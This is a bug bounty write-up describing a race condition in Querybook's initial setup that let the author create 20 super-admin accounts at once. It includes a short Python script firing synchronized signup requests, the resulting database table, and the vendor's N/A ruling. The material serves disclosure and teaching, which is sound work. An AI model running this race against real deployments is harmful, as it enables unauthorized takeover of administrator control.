Press enter or click to view image in full size
A deep dive into a Time-of-Check to Time-of-Use (TOCTOU) flaw during application setup, and the debate between “Internal Tools” vs. Zero Trust.
In the world of web security, Race Conditions (specifically TOCTOU — Time-of-Check to Time-of-Use) are some of the most fascinating vulnerabilities to exploit. They occur when a system checks a condition, but before it can act on that check, the state of the system changes.
Recently, while auditing Querybook (an open-source big data IDE developed by Pinterest), I discovered a classic race condition in its initial setup phase. This flaw allowed me to bypass the intended “Single Administrator” restriction and simultaneously create 20 Super-Admin accounts.
In this write-up, I’ll break down the technical flaw in the code, how I exploited it, and discuss the interesting bug bounty debate on why this was marked as “Not Applicable” (N/A) due to internal deployment assumptions.
Querybook has a convenient feature for initial deployments: the very first user who registers on a fresh instance is automatically granted the ADMIN role.
The logic is simple:
ADMIN role to this new user.USER role.This seems logical for an initial setup. However, in concurrent environments, “simple” checks often lead to critical failures if not implemented with atomicity.
The vulnerability resides in the backend logic, specifically in querybook/server/logic/user.py within the create_admin_when_no_admin function.
The code essentially performs a read operation (if len(get_all_admin_user_roles...) == 0) followed by a write operation (promoting the user).
The Problem: There is no database-level locking (like SELECT ... FOR UPDATE) or application-level mutex around this critical section. If multiple requests hit the server at the exact same millisecond, they all perform the "Check" simultaneously. They all see 0 admins, and the application proceeds to promote all of them to the Admin role.
To prove this wasn’t just a theoretical issue, I spun up a fresh Docker instance of Querybook locally. I wrote a Python script utilizing threading.Barrier to ensure that exactly 20 HTTP POST requests hit the /ds/signup/ endpoint at the exact same millisecond.
Join Medium for free to get updates from this writer.
Python
import threading
import requestsTARGET_URL = "http://localhost:10001/ds/signup/"
THREADS_COUNT = 20
barrier = threading.Barrier(THREADS_COUNT)
def trigger_race(thread_id):
payload = {"username": f"admin_race_{thread_id}", "password": "Password123!", "fullname": f"Race Admin"}
barrier.wait() # Synchronize all threads
requests.post(TARGET_URL, json=payload)
# ... thread execution logic ...
The Result:
The attack was a complete success. All 20 threads returned a 200 OK.
When I audited the MySQL database, the proof was undeniable:
Plaintext
+---------------+-------+---------------------+
| username | role | created_at |
+---------------+-------+---------------------+
| admin_race_0 | ADMIN | 2026-03-22 16:37:51 |
| admin_race_1 | ADMIN | 2026-03-22 16:37:51 |
...
| admin_race_19 | ADMIN | 2026-03-22 16:37:51 |
+---------------+-------+---------------------+Press enter or click to view image in full size
20 distinct users were granted ADMIN privileges at the exact same timestamp.
Logging into the UI with any of these accounts revealed the Admin Gear Icon, granting full access to environment settings, query engines, and all organizational data. The instance was permanently compromised.
I reported this via the Bugcrowd platform, providing the video PoC, the Python script, and the database logs. The triage team verified the issue, but the Program Owner ultimately marked it as Not Applicable (N/A).
Their Argument:
The customer stated that Querybook is intended to be an internal tool, not internet-facing. Because the vulnerable setup endpoint is only reachable from the local network during the very first run (a narrow time window), an attacker would need local network access during that exact moment. They argued that anyone with that level of internal access is already considered a “Highly Trusted User.”
The Counter-Argument (Zero Trust):
While I respect the vendor’s threat model, this highlights a massive divide in modern security philosophies:
For developers, the takeaway is clear: Never rely on non-atomic Read-then Write checks for critical state changes. Always use database-level locks, unique constraints, or Mutexes when handling initialization logic.
For bug bounty hunters: Don’t get discouraged by “N/A” resolutions on architectural/deployment debates. The vulnerability was real, the exploit was flawless, and the technical learning was invaluable. Sometimes, the security community’s view of “Risk” simply doesn’t align with a specific company’s accepted threat model.
Keep hunting, keep writing, and never stop questioning the logic!